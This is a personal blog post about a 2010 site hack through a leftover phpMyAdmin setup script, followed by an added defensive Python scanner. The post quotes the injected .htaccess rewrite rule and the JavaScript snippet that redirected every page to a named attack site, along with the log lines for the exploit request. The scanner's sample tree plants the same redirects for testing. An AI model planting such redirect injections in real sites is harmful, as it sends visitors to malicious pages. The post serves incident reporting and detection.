I've been hacked!
Today – at 4:26pm (server time) my site was hacked.
All pages on the site were redirecting to http://webarh.com/z.php (don't go there – it's an attack site – the buggers.)
After trying to figure out how they got in – I found that my server (which is a VPS) has PhpMySQL installed as a default in apache to attach to the alias of /myadmin. They (the hackors/bot/whatev) attached through a BASIC DEFAULT INSTALL SCRIPT THE MORONS LEFT OPEN. There. I feel a bit better.
Okay – I've removed the GAPING WIDE HOLE in my server by removing the unwanted application and restored the site from backups. Since it's only been hijacked for just under four hours, I am hoping not too many people have been affected (mainly the search bots which will tag the site as infected).
I really can't believe that the installation script was left after the system admins made the image for my VPS. Really dumb. As a user of the hosting – I wasn't even aware that the addition of an apache alias was even installed. I've been hacked because of my own stupidity before – and I find it annoying – but being hacked because of someone else's mistake is extremely aggravating.
The final attack updated all .htaccess files to include:
RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/z.php
And they inserted the following in the base of the index.php and index.html files for each folder:
<script>document.location.href='http://webarh.com/z.php';</script>
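As an added defensive check (not part of the original post): a small script that walks a web root for the two injected artifacts described above, an .htaccess RewriteRule sending every request to an off-site URL and a document.location.href redirect appended to index files. The sample tree and the attacker.example hostname are constructed placeholders standing in for the real redirect target.

```python
import os
import re
import tempfile

# Indicators for the two injections described in the post: a RewriteRule whose target is an
# absolute off-site URL, and a <script> that sets document.location.href to an absolute URL.
HTACCESS_REDIRECT = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.M | re.I)
JS_REDIRECT = re.compile(r"<script>\s*document\.location\.href\s*=\s*['\"](https?://[^'\"]+)['\"]", re.I)

def scan_webroot(root, trusted_hosts):
    """Walk a web root; return (relative path, kind, url) for each redirect to an untrusted host."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lower = name.lower()
            if lower != ".htaccess" and lower not in ("index.php", "index.html"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                data = fh.read()
            kind = "htaccess" if lower == ".htaccess" else "js"
            pattern = HTACCESS_REDIRECT if kind == "htaccess" else JS_REDIRECT
            for match in pattern.finditer(data):
                url = match.group(1)
                host = re.sub(r"^https?://", "", url).split("/")[0].lower()
                if host not in trusted_hosts:  # redirects to the site's own host are legitimate
                    findings.append((os.path.relpath(path, root), kind, url))
    return findings

def build_sample_site():
    """Constructed sample tree: a clean root folder plus one subfolder carrying both injections."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "blog"))
    with open(os.path.join(root, ".htaccess"), "w") as f:          # legitimate internal rewrite
        f.write("RewriteEngine On\nRewriteBase /\nRewriteRule ^(.*)$ index.php [L]\n")
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'hello'; ?>\n")
    with open(os.path.join(root, "blog", ".htaccess"), "w") as f:  # injected off-site rewrite
        f.write("RewriteEngine On\nRewriteBase /\nRewriteRule ^(.*)? http://attacker.example/z.php\n")
    with open(os.path.join(root, "blog", "index.html"), "w") as f:  # injected JS redirect at end of file
        f.write("<html><body>post</body></html>\n"
                "<script>document.location.href='http://attacker.example/z.php';</script>\n")
    return root

if __name__ == "__main__":
    for hit in scan_webroot(build_sample_site(), {"example.com"}):
        print(hit)
```

Run it against the real document root with the site's own hostname in trusted_hosts; anything it returns is a file to restore from backup.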
The log files show a single GET and then POST to the file:
174.129.214.209 - - [17/Oct/2010:16:26:38 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 200 14060 "-" "-"
174.129.214.209 - - [17/Oct/2010:16:26:38 -0400] "POST /myadmin/scripts/setup.php HTTP/1.1" 200 - "-" "-"
That's it. That's the hacker. The host manager has been notified.